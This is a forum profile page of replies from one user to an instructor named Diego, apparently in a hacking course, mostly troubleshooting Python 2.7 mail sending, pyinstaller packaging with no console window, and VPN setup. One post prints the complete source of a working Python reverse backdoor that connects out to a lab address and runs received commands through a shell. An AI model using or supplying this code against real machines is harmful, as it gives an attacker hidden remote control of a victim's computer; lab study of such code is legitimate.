Forum Replies Created
- AuthorPosts
Peter Queen
ParticipantHello Diego,
Yes I did and I already imported a fresh one and I get the same error!
Peter Queen
ParticipantHello Diego,
What I meant is pip worked to install pyinstaller but still I can’t manage to install smptlib! I read that it comes already installed in python and it is just a matter of importing it. Any more suggestions? Being not able to send mail it’s a problem.
Thanks
Peter Queen
ParticipantP.S. Although it doesn’t show in the post the two dash are separate before the word noconsole.
Peter Queen
ParticipantHello Diego,
I have 2.7.18, I have now created a new Windows VM, downloaded Python and still when i try to import smptlib i get the same error!I import pyinstaller and it worked fine. Can you think of any solution? Should I dload Python 3? If so I did not take note of the Python 3 difference in the codes.
Thanks
Peter Queen
ParticipantSorted it I needed to allow more data and except Error
Peter Queen
ParticipantFor some reason the format of the reverse backdoor got mixed up, here it is :
#!/usr/bin/env python import socket import subprocess import json class Backdoor: def __init__(self, ip, port): self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.connection.connect((ip, port)) def reliable_send(self, data): json_data = json.dumps(data) self.connection.send(json_data) def reliable_receive(self): json_data = self.connection.recv(1024) return json.loads(json_data) def execute_system_command(self, command): return subprocess.check_output(command, shell=True) def run(self): while True: command = self.reliable_receive() command_result = self.execute_system_command(command) self.reliable_send(command_result) connection.close() my_backdoor = Backdoor("10.0.2.15", 4444) my_backdoor.run()
Peter Queen
ParticipantHello Diego,
I am trying it on the Windows VM machine.
Anything I can do ?
Peter Queen
ParticipantHello Diego,
It doesn’t work with TAILS, maybe because due to restriction where i leave I must use Stealth Mode and i can’t figure out how to set it from the terminal when i launch the VPN.
Peter Queen
ParticipantHello Diego,
When I try to install smptlib I get this error:
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support ERROR: Could not find a version that satisfies the requirement smptlib (from versions: none) ERROR: No matching distribution found for smptlib
Please advise
Peter Queen
ParticipantSort thanks Diego!, just added return
Peter Queen
ParticipantHello Diego,
I tried over and over but doesn’t work, can I connect to another server instead of Gmail?
Peter Queen
ParticipantHello Diego,
any news on this?
Thanks
Peter Queen
ParticipantHello Diego,
Yes I have connection.
Please advise
Peter Queen
ParticipantThanks Diego it works!
Peter Queen
ParticipantHi Diego I sorted it thanks!
- AuthorPosts